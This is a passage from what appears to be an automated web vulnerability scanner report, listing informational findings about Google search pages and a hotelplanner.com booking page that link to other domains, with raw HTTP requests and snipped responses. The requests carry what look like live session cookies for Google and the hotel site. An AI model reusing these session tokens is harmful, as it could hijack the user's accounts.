User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sabretravelnetwork.com/home/search/show_results?cx=000492012218074769583%3Az9egyc6spxy&cof=FORID%3A10&ie=UTF-8&q=travel+booking+hotel&sa.x=0&sa.y=0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; HSID=AbppJa1_E7iMausjK; APISID=qfB18aLM4wkSRyYX/Aqw8quAKRHd7UuSmT; NID=51=F8u0EXbNU4KGhvc02SYfdp-DEFElXzMn6jXCTpOMvEOJYkdCLz3OJlTrIyDS_Aq137v2MBKPkV6-2QEY3WGlenJjN02KGhLt0GGahhHj45EKWRTWFnwTHKW2IIFkuGEp; SID=DQAAAO8AAAD7Xl0oDS_3Xy0JKwYeKgRjiseRQ5RQhy1HkhvGkXHmsNhgjgFcxIvEQml1xQy4kfn3D8kLNKn65zc1MAG0lQZ9fXoBuBEQv5EZpYNngUVXPJs8CkJJcRIXe7Mv4nXsVmtUd53Kjtci_dg4wZmFbdS0AW4_-GZxkHqFNrF7oBEHAXDX5EInFgoM8uJfPLnmq7RtE08Jv7niuGLAj0uzqGrVCu1FFm4HJYTnPW9Cf3H_wYqq2_t8bjpwOZX7v82cbjjersLVCT9TQrY5ODnCVnC-N_HE7HvI1ocYVAocXOlzaoLWJ_Wb1dvDoeYQr2-aU4c

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 03 Oct 2011 00:58:36 GMT
Expires: -1
Cache-Control: private, max-age=0
X-Frame-Options: ALLOWALL
X-Content-Type-Options: nosniff
Server: qfe
Content-Length: 22066
X-XSS-Protection: 1; mode=block

<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title>travel booking hotel - Google Search</title><style>html{overflow-y:scroll} div,td,.n a,.n a:visited{ color:#333 }
...[SNIP]...
<h2 class="r"><a class="l" href="http://www.sabretravelnetwork.com/home/products_services" onmousedown="return curwt(this, 'http://www.sabretravelnetwork.com/home/products_services')" target="_top">Sabre <b>
...[SNIP]...
<h2 class="r"><a class="l" href="http://www.sabretravelnetwork.com/images/uploads/releases/GT_Hotel_Mobile_Rls_FINAL.pdf" onmousedown="return curwt(this, 'http://www.sabretravelnetwork.com/images/uploads/releases/GT_Hotel_Mobile_Rls_FINAL.pdf')" target="_top">GetThere Introduces Mobile <b>
...[SNIP]...
<h2 class="r"><a class="l" href="http://www.sabretravelnetwork.com/home/products_services/products/sabre_res" onmousedown="return curwt(this, 'http://www.sabretravelnetwork.com/home/products_services/products/sabre_res')" target="_top">Sabre .Res - Sabre <b>
...[SNIP]...
<h2 class="r"><a class="l" href="http://www.sabretravelnetwork.com/home/products_services/government/" onmousedown="return curwt(this, 'http://www.sabretravelnetwork.com/home/products_services/government/')" target="_top">Government <b>
...[SNIP]...
<h2 class="r"><a class="l" href="http://www.sabretravelnetwork.com/home/products_services/travel_supplier/hotel/" onmousedown="return curwt(this, 'http://www.sabretravelnetwork.com/home/products_services/travel_supplier/hotel/')" target="_top"><b>
...[SNIP]...
<h2 class="r"><a class="l" href="http://www.sabretravelnetwork.com/home/products_services/products/world_choice_travel" onmousedown="return curwt(this, 'http://www.sabretravelnetwork.com/home/products_services/products/world_choice_travel')" target="_top">World Choice <b>
...[SNIP]...
<h2 class="r"><a class="l" href="http://www.sabretravelnetwork.com/home/products_services/products/sabre_hotel_vision" onmousedown="return curwt(this, 'http://www.sabretravelnetwork.com/home/products_services/products/sabre_hotel_vision')" target="_top">Sabre <b>
...[SNIP]...
<h2 class="r"><a class="l" href="http://www.sabretravelnetwork.com/home/products_services/products/getthere_directgovernment/" onmousedown="return curwt(this, 'http://www.sabretravelnetwork.com/home/products_services/products/getthere_directgovernment/')" target="_top">GetThere DirectGovernment | Sabre <b>
...[SNIP]...
<h2 class="r"><a class="l" href="http://www.sabretravelnetwork.com/home/products_services/products/sabre_red_workspace" onmousedown="return curwt(this, 'http://www.sabretravelnetwork.com/home/products_services/products/sabre_red_workspace')" target="_top">Sabre Red Workspace - Sabre <b>
...[SNIP]...
<h2 class="r"><a class="l" href="http://www.sabretravelnetwork.com/home/products_services/products/sabre_vacations" onmousedown="return curwt(this, 'http://www.sabretravelnetwork.com/home/products_services/products/sabre_vacations')" target="_top">Sabre Vacations - Sabre <b>
...[SNIP]...

19.194. http://www.google.com/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string.

The response contains the following links to other domains:

Request

GET /search?gcx=c&sourceid=chrome&ie=UTF-8&q=.hotelplanner.com HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; HSID=AbppJa1_E7iMausjK; APISID=qfB18aLM4wkSRyYX/Aqw8quAKRHd7UuSmT; NID=51=F8u0EXbNU4KGhvc02SYfdp-DEFElXzMn6jXCTpOMvEOJYkdCLz3OJlTrIyDS_Aq137v2MBKPkV6-2QEY3WGlenJjN02KGhLt0GGahhHj45EKWRTWFnwTHKW2IIFkuGEp; SID=DQAAAO8AAAD7Xl0oDS_3Xy0JKwYeKgRjiseRQ5RQhy1HkhvGkXHmsNhgjgFcxIvEQml1xQy4kfn3D8kLNKn65zc1MAG0lQZ9fXoBuBEQv5EZpYNngUVXPJs8CkJJcRIXe7Mv4nXsVmtUd53Kjtci_dg4wZmFbdS0AW4_-GZxkHqFNrF7oBEHAXDX5EInFgoM8uJfPLnmq7RtE08Jv7niuGLAj0uzqGrVCu1FFm4HJYTnPW9Cf3H_wYqq2_t8bjpwOZX7v82cbjjersLVCT9TQrY5ODnCVnC-N_HE7HvI1ocYVAocXOlzaoLWJ_Wb1dvDoeYQr2-aU4c

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:40:58 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Get-Dictionary: /sdch/sXoKgwNA.dct
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 134623

<!doctype html> <head> <title>.hotelplanner.com - Google Search</title> <script>window.google={kEI:"qhKJTpngEebZiALY7bDXDA",getEI:function(a){var b;while(a&&!(a.getAttribute&&(b=a.getAttribute(
...[SNIP]...
<li class=gbmtc><a onclick=gbar.qs(this) class=gbmt id=gb_36 href="http://www.youtube.com/results?gcx=c&q=.hotelplanner.com&um=1&ie=UTF-8&sa=N&hl=en&tab=w1" onclick="gbar.logger.il(1,{t:36})">YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://www.hotelplanner.com/" class=l onmousedown="return clk(this,this.href,'','','','1','','0CEEQFjAA')">Group Travel - Group Hotel Rates &amp; Event Planner Discounts <b>
...[SNIP]...
<span class=vshid><a href="http://webcache.googleusercontent.com/search?q=cache:W1JpwSHCGSMJ:www.hotelplanner.com/+.hotelplanner.com&amp;cd=1&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','1','','0CEMQIDAA')">Cached</a>
...[SNIP]...
<h3 class=r style="display:inline"><a href="http://www.hotelplanner.com/search/" class=l onmousedown="return clk(this,this.href,'','','','2','','0CEgQjBAwAQ')">Search For Hotel <b>
...[SNIP]...
<h3 class=r style="display:inline"><a href="http://www.hotelplanner.com/ContactUs.cfm" class=l onmousedown="return clk(this,this.href,'','','','3','','0CE0QjBAwAg')">Contact Us</a>
...[SNIP]...
<h3 class=r style="display:inline"><a href="http://www.hotelplanner.com/Hotels/2175-in-Las-Vegas-NV.html" class=l onmousedown="return clk(this,this.href,'','','','4','','0CFIQjBAwAw')">Hotels in Las Vegas NV</a>
...[SNIP]...
<h3 class=r style="display:inline"><a href="http://www.hotelplanner.com/HotelForm.cfm" class=l onmousedown="return clk(this,this.href,'','','','5','','0CFcQjBAwBA')">Hotel Signup</a>
...[SNIP]...
<h3 class=r style="display:inline"><a href="http://findgroupdeals.hotelplanner.com/" class=l onmousedown="return clk(this,this.href,'','','','6','','0CFwQjBAwBQ')">FindGroupDeals.com</a>
...[SNIP]...
<h3 class=r style="display:inline"><a href="http://www.hotelplanner.com/GroupForm.cfm" class=l onmousedown="return clk(this,this.href,'','','','7','','0CGEQjBAwBg')">Group Hotel Reservation <b>
...[SNIP]...
<h3 class="r"><a href="http://www.facebook.com/hotelplanner" class=l onmousedown="return clk(this,this.href,'','','','8','','0CGkQFjAH')"><em>
...[SNIP]...
<span class=vshid><a href="http://webcache.googleusercontent.com/search?q=cache:YifskaDOUAQJ:www.facebook.com/hotelplanner+.hotelplanner.com&amp;cd=8&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','8','','0CGsQIDAH')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://itunes.apple.com/us/app/hotelplanner.com-hotel-reservations/id420759661?mt=8" class=l onmousedown="return clk(this,this.href,'','','','9','','0CHAQFjAI')">App Store - <em>
...[SNIP]...
<span class=vshid><a href="http://webcache.googleusercontent.com/search?q=cache:5I53_q5_HLQJ:itunes.apple.com/us/app/hotelplanner.com-hotel-reservations/id420759661%3Fmt%3D8+.hotelplanner.com&amp;cd=9&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,'http://webcache.googleusercontent.com/search?q=cache:5I53_q5_HLQJ:itunes.apple.com/us/app/hotelplanner.com-hotel-reservations/id420759661%3Fmt%3D8+.hotelplanner.com&cd=9&hl=en&ct=clnk&gl=us','','','','9','','0CHUQIDAI')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.gadling.com/2011/01/11/free-hotel-rooms-nfl-playoffs/" class=l onmousedown="return clk(this,this.href,'','','','10','','0CHkQFjAJ')"><em>
...[SNIP]...
<span class=vshid><a href="http://webcache.googleusercontent.com/search?q=cache:4jspZpZhRBoJ:www.gadling.com/2011/01/11/free-hotel-rooms-nfl-playoffs/+.hotelplanner.com&amp;cd=10&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','10','','0CHsQIDAJ')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://groups.airporthotelguide.com/GroupForm.cfm" class=l onmousedown="return clk(this,this.href,'','','','11','','0CH8QFjAK')">Group Hotel Reservation Request</a>
...[SNIP]...
<span class=vshid><a href="http://webcache.googleusercontent.com/search?q=cache:7QoQ-fsWdaUJ:groups.airporthotelguide.com/GroupForm.cfm+.hotelplanner.com&amp;cd=11&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','11','','0CIEBECAwCg')">Cached</a>
...[SNIP]...
<h3 class=r><a href="http://www.youtube.com/watch?v=jOcvNV-xR90" class=l onmousedown="return clk(this,this.href,'','10153135791215298525','','12','','0CIUBELcCMAs')"><em>
...[SNIP]...
<h3 class=r><a href="http://www.youtube.com/watch?v=OWJhdsZJiyI" class=l onmousedown="return clk(this,this.href,'','4134974570640280354','','13','','0CIsBELcCMAw')"><em>
...[SNIP]...
<h3 class="r"><a href="https://market.android.com/developer?pub=HotelPlanner.com" class=l onmousedown="return clk(this,this.href,'','','','14','','0CJMBEBYwDQ')">Apps by <em>
...[SNIP]...
<span class=vshid><a href="http://webcache.googleusercontent.com/search?q=cache:ujjqJaXtWbMJ:https://market.android.com/developer%3Fpub%3DHotelPlanner.com+.hotelplanner.com&amp;cd=14&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,'http://webcache.googleusercontent.com/search?q=cache:ujjqJaXtWbMJ:https://market.android.com/developer%3Fpub%3DHotelPlanner.com+.hotelplanner.com&cd=14&hl=en&ct=clnk&gl=us','','','','14','','0CJUBECAwDQ')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.retailmenot.com/view/hotelplanner.com" class=l onmousedown="return clk(this,this.href,'','','','15','','0CJkBEBYwDg')"><em>
...[SNIP]...
<h3 class="r"><a href="http://www.prnewswire.com/news-releases/hotelplannercom-is-proud-to-announce-the-addition-of-doug-robinson-as-their-new-regional-director-of-product-in-the-new-england-states-128829198.html" class=l onmousedown="return clk(this,this.href,'','','','16','','0CJ8BEBYwDw')"><em>
...[SNIP]...
<span class=vshid><a href="http://webcache.googleusercontent.com/search?q=cache:l3fqC6qZdpAJ:www.prnewswire.com/news-releases/hotelplannercom-is-proud-to-announce-the-addition-of-doug-robinson-as-their-new-regional-director-of-product-in-the-new-england-states-128829198.html+.hotelplanner.com&amp;cd=16&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','16','','0CKEBECAwDw')">Cached</a>
...[SNIP]...
<div><a href="http://www.groople.com/" class=l onmousedown="return clk(this,this.href,'','','','17','','0CKYBEKIIMBA')">Groople</a>
...[SNIP]...
<div><a href="http://www.grouptraveldirectory.com/" class=l onmousedown="return clk(this,this.href,'','','','18','','0CKgBEKIIMBE')">Add to Trip Ideas</a>
...[SNIP]...
<div><a href="http://www.ichotelsgroup.com/" class=l onmousedown="return clk(this,this.href,'','','','19','','0CKoBEKIIMBI')">InterContinental Hotels Group</a>
...[SNIP]...
<div><a href="http://www.grouptravel.com/" class=l onmousedown="return clk(this,this.href,'','','','20','','0CKwBEKIIMBM')">Group Travel</a>
...[SNIP]...

19.195. http://www.google.com/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string.

The response contains the following links to other domains:

Request

GET /search?gcx=c&sourceid=chrome&ie=UTF-8&q=sabre+travel HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; HSID=AbppJa1_E7iMausjK; APISID=qfB18aLM4wkSRyYX/Aqw8quAKRHd7UuSmT; NID=51=F8u0EXbNU4KGhvc02SYfdp-DEFElXzMn6jXCTpOMvEOJYkdCLz3OJlTrIyDS_Aq137v2MBKPkV6-2QEY3WGlenJjN02KGhLt0GGahhHj45EKWRTWFnwTHKW2IIFkuGEp; SID=DQAAAO8AAAD7Xl0oDS_3Xy0JKwYeKgRjXmxcb1SChjECiXSjEaqO-DnawkdCeNdpQ1eq5H7VQaB1TYoVNaHivfCOnRdR3nNOQ08CAf6CRApbTves9jTDvA3EsEz817LyYCYCbZsTHriQICDzjjFZGK6LqC9xB10_TSh1omi0Cz3S6WTEQKI4YWzinp7wd_vo_RGZ0Q7Pmh8a7ryXTtM1Q9zJgPjGhZAWlQtcmVUtvW6l7weDo9XnzQ4xsrHMoS73ySwvooWqNnqucKMrgZgH8M9keX_Pz9mAcFTAqTRl1KdCO3svISfz05dJpITuMlwLigsrRt_DeV0

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:06:50 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Get-Dictionary: /sdch/sXoKgwNA.dct
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 119232

<!doctype html> <head> <title>sabre travel - Google Search</title> <script>window.google={kEI:"mvyIToKwK-vViAKS4LWcDA",getEI:function(a){var b;while(a&&!(a.getAttribute&&(b=a.getAttribute("eid"
...[SNIP]...
<li class=gbmtc><a onclick=gbar.qs(this) class=gbmt id=gb_36 href="http://www.youtube.com/results?gcx=c&q=sabre+travel&um=1&ie=UTF-8&sa=N&hl=en&tab=w1" onclick="gbar.logger.il(1,{t:36})">YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://www.sabretravelnetwork.com/" class=l onmousedown="return clk(this,this.href,'','','','1','','0CD0QFjAA')"><em>
...[SNIP]...
<span class=vshid><a href="http://webcache.googleusercontent.com/search?q=cache:C0jdpcu8rrkJ:www.sabretravelnetwork.com/+sabre+travel&amp;cd=1&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','1','','0CD8QIDAA')">Cached</a>
...[SNIP]...
<div class=osl><a href="http://www.sabretravelnetwork.com/home/products_services/travel_agency/" onmousedown="return clk(this,this.href,'','','','1','','0CEEQ0gIoADAA')">Agencies</a> - <a href="http://en.eu.sabretravelnetwork.com/" onmousedown="return clk(this,this.href,'','','','1','','0CEIQ0gIoATAA')">Sabre Travel Network - Home</a> - <a href="http://www.sabretravelnetwork.com/home/products_services" onmousedown="return clk(this,this.href,'','','','1','','0CEMQ0gIoAjAA')">Products services</a> - <a href="http://www.sabretravelnetwork.com/home/news_events/" onmousedown="return clk(this,this.href,'','','','1','','0CEQQ0gIoAzAA')">News &amp; Events</a>
...[SNIP]...
<h3 class="r"><a href="http://en.eu.sabretravelnetwork.com/" class=l onmousedown="return clk(this,this.href,'','','','2','','0CEkQFjAB')"><em>
...[SNIP]...
<span class=vshid><a href="http://webcache.googleusercontent.com/search?q=cache:4MbH0YuIU1AJ:en.eu.sabretravelnetwork.com/+sabre+travel&amp;cd=2&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','2','','0CEsQIDAB')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.sabretravelnetwork.com/home/about/" class=l onmousedown="return clk(this,this.href,'','','','3','','0CFAQFjAC')">About Us | <em>
...[SNIP]...
<span class=vshid><a href="http://webcache.googleusercontent.com/search?q=cache:HEPdMT7qgnUJ:www.sabretravelnetwork.com/home/about/+sabre+travel&amp;cd=3&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','3','','0CFIQIDAC')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.virtuallythere.com/" class=l onmousedown="return clk(this,this.href,'','','','4','','0CFkQFjAD')">Virtually There - your <em>
...[SNIP]...
<span class=vshid><a href="http://webcache.googleusercontent.com/search?q=cache:e7rcZ0whvZUJ:www.virtuallythere.com/+sabre+travel&amp;cd=4&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','4','','0CFsQIDAD')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.sabre.com/" class=l onmousedown="return clk(this,this.href,'','','','5','','0CGAQFjAE')"><em>
...[SNIP]...
<span class=vshid><a href="http://webcache.googleusercontent.com/search?q=cache:mh3ZzgVhDgUJ:www.sabre.com/+sabre+travel&amp;cd=5&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','5','','0CGIQIDAE')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://en.wikipedia.org/wiki/Sabre_Travel_Network" class=l onmousedown="return clk(this,this.href,'','','','6','','0CGcQFjAF')"><em>
...[SNIP]...
<span class=vshid><a href="http://webcache.googleusercontent.com/search?q=cache:bXNodkTu-u0J:en.wikipedia.org/wiki/Sabre_Travel_Network+sabre+travel&amp;cd=6&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','6','','0CGkQIDAF')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://sabre-holdings.com/ourBrands/travelNetwork.html" class=l onmousedown="return clk(this,this.href,'','','','7','','0CG4QFjAG')">Sabre Holdings :: <em>
...[SNIP]...
<span class=vshid><a href="http://webcache.googleusercontent.com/search?q=cache:XyuPznqHAMIJ:sabre-holdings.com/ourBrands/travelNetwork.html+sabre+travel&amp;cd=7&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','7','','0CHAQIDAG')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.sabrepacific.com.au/" class=l onmousedown="return clk(this,this.href,'','','','8','','0CHQQFjAH')"><em>
...[SNIP]...
<span class=vshid><a href="http://webcache.googleusercontent.com/search?q=cache:FVnxCxo34dQJ:www.sabrepacific.com.au/+sabre+travel&amp;cd=8&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','8','','0CHYQIDAH')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.searchenginejournal.com/sabre-travel-network-versus-travelport-social/28616/" class=l onmousedown="return clk(this,this.href,'','','','9','','0CHsQFjAI')"><em>
...[SNIP]...
<span class=vshid><a href="http://webcache.googleusercontent.com/search?q=cache:wnv03zeGa04J:www.searchenginejournal.com/sabre-travel-network-versus-travelport-social/28616/+sabre+travel&amp;cd=9&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','9','','0CH0QIDAI')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://sabrehotelrfp.net/" class=l onmousedown="return clk(this,this.href,'','','','10','','0CIEBEBYwCQ')"><em>
...[SNIP]...
<span class=vshid><a href="http://webcache.googleusercontent.com/search?q=cache:dhIqhnI6gNYJ:sabrehotelrfp.net/+sabre+travel&amp;cd=10&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','10','','0CIMBECAwCQ')">Cached</a>
...[SNIP]...
<span class=tl><a href="http://jobs.travelweekly.co.uk/job/48299/sabre-business-travel-consultants-needed-/?TrackID=1&amp;deviceType=Desktop" class=l onmousedown="return clk(this,this.href,'','','','11','','0CIcBEKkCMAo')"><em>
...[SNIP]...
<span class=tl><a href="http://www.bradenton.com/2011/09/30/3536810/thetrainlinecom-announces-new.html" class=l onmousedown="return clk(this,this.href,'','','','12','','0CI0BEKkCMAs')">thetrainline.com Announces New Agreement With <em>
...[SNIP]...
<span class=tl><a href="http://www.businessweek.com/news/2011-09-27/sabre-asks-court-to-toss-american-airlines-antitrust-claim.html" class=l onmousedown="return clk(this,this.href,'','','','13','','0CJIBEKkCMAw')"><em>
...[SNIP]...

19.196. http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotelplanner.com
Path:   /Hotel/HotelRoomTypes.cfm

Issue detail

The page was loaded from a URL containing a query string.

The response contains the following links to other domains:

Request

GET /Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab HTTP/1.1
Host: www.hotelplanner.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Search/index.cfm?City=Boston%2C+MA&InDate=10%2F4%2F2011&OutDate=10%2F7%2F2011&NumRooms=1&ViewType=List&HotelName=&Rating=&PriceMin=1&PriceMax=9999&btnGo.x=113&btnGo.y=15
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; LOCALE=en%5FUS; CURRENCY=USD; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LANGUAGE=1; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.2.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:29:43 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 229491

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Hotel Availability - Millennium Bostonian Hotel Boston</title>
       <meta http-equiv="Content-Type" content="t
...[SNIP]...
</script>
       <script type="text/javascript" src="http://apis.google.com/js/plusone.js"></script>
...[SNIP]...
</script>
   
<script type="text/javascript" src="http://maps.googleapis.com/maps/api/js?v=3&sensor=false&language=en"></script>
...[SNIP]...
</a>&nbsp;&nbsp;<a href="http://maps.google.com/maps?f=d&hl=en&geocode=&saddr=&daddr=26%20North%20St%2C%20Boston%2C%20MA%2002109&ie=UTF8&z=16" target="_blank"><strong>
...[SNIP]...
<td colspan="2">
           
               <img src="http://images.travelnow.com/hotelimages/s/010000/010158A.jpg" border="0" align="right" width="374" height="288" vspace="5" hspace="5" alt="Millennium Bostonian Hotel Boston">
           <p>
...[SNIP]...
<a href="javascript:ShowPhoto(0);switchDisplay('ImageViewer','block');">
           <img src="http://images.travelnow.com/hotelimages/s/010000/010158A-thumb.jpg" border="2" width="64" height="64" hspace="5" alt="Exterior"></a>
           
           <a href="javascript:ShowPhoto(1);switchDisplay('ImageViewer','block');">
           <img src="http://images.travelnow.com/hotelimages/s/010000/010158B-thumb.jpg" border="2" width="64" height="64" hspace="5" alt="Lobby"></a>
           
           <a href="javascript:ShowPhoto(2);switchDisplay('ImageViewer','block');">
           <img src="http://images.travelnow.com/hotelimages/s/010000/010158C-thumb.jpg" border="2" width="64" height="64" hspace="5" alt="Guestroom"></a>
           
           <a href="javascript:ShowPhoto(3);switchDisplay('ImageViewer','block');">
           <img src="http://images.travelnow.com/hotelimages/s/010000/010158D-thumb.jpg" border="2" width="64" height="64" hspace="5" alt="Recreation"></a>
           
           <a href="javascript:ShowPhoto(4);switchDisplay('ImageViewer','block');">
           <img src="http://images.travelnow.com/hotelimages/s/010000/010158E-thumb.jpg" border="2" width="64" height="64" hspace="5" alt="Choice1"></a>
           
           <a href="javascript:ShowPhoto(5);switchDisplay('ImageViewer','block');">
           <img src="http://images.travelnow.com/hotelimages/s/010000/010158F-thumb.jpg" border="2" width="64" height="64" hspace="5" alt="Choice2"></a>
           
           <a href="javascript:ShowPhoto(6);switchDisplay('ImageViewer','block');">
           <img src="http://images.travelnow.com/hotels/1000000/20000/15200/15159/15159_26_t.jpg" border="2" width="64" height="64" hspace="5" alt="Lobby"></a>
           
           <a href="javascript:ShowPhoto(7);switchDisplay('ImageViewer','block');">
           <img src="http://images.travelnow.com/hotels/1000000/20000/15200/15159/15159_27_t.jpg" border="2" width="64" height="64" hspace="5" alt="Fitness and Wellness"></a>
           
           <a href="javascript:ShowPhoto(8);switchDisplay('ImageViewer','block');">
           <img src="http://images.travelnow.com/hotels/1000000/20000/15200/15159/15159_28_t.jpg" border="2" width="64" height="64" hspace="5" alt="Fitness and Wellness"></a>
...[SNIP]...
<a href="javascript:ShowPhoto(9);switchDisplay('ImageViewer','block');">
           <img src="http://images.travelnow.com/hotels/1000000/20000/15200/15159/15159_29_t.jpg" border="2" width="64" height="64" hspace="5" alt="Guest Room"></a>
           
           <a href="javascript:ShowPhoto(10);switchDisplay('ImageViewer','block');">
           <img src="http://images.travelnow.com/hotels/1000000/20000/15200/15159/15159_31_t.jpg" border="2" width="64" height="64" hspace="5" alt="Guest Room"></a>
           
           <a href="javascript:ShowPhoto(11);switchDisplay('ImageViewer','block');">
           <img src="http://images.travelnow.com/hotels/1000000/20000/15200/15159/15159_32_t.jpg" border="2" width="64" height="64" hspace="5" alt="Lobby"></a>
           
           <a href="javascript:ShowPhoto(12);switchDisplay('ImageViewer','block');">
           <img src="http://images.travelnow.com/hotels/1000000/20000/15200/15159/15159_33_t.jpg" border="2" width="64" height="64" hspace="5" alt="Restaurant"></a>
           
           <a href="javascript:ShowPhoto(13);switchDisplay('ImageViewer','block');">
           <img src="http://images.travelnow.com/hotels/1000000/20000/15200/15159/15159_34_t.jpg" border="2" width="64" height="64" hspace="5" alt="Restaurant"></a>
           
           <a href="javascript:ShowPhoto(14);switchDisplay('ImageViewer','block');">
           <img src="http://images.travelnow.com/hotels/1000000/20000/15200/15159/15159_36_t.jpg" border="2" width="64" height="64" hspace="5" alt="Dining"></a>
           
           <a href="javascript:ShowPhoto(15);switchDisplay('ImageViewer','block');">
           <img src="http://images.travelnow.com/hotels/1000000/20000/15200/15159/15159_37_t.jpg" border="2" width="64" height="64" hspace="5" alt="Dining"></a>
           
           <a href="javascript:ShowPhoto(16);switchDisplay('ImageViewer','block');">
           <img src="http://images.travelnow.com/hotels/1000000/20000/15200/15159/15159_38_t.jpg" border="2" width="64" height="64" hspace="5" alt="Interior"></a>
           
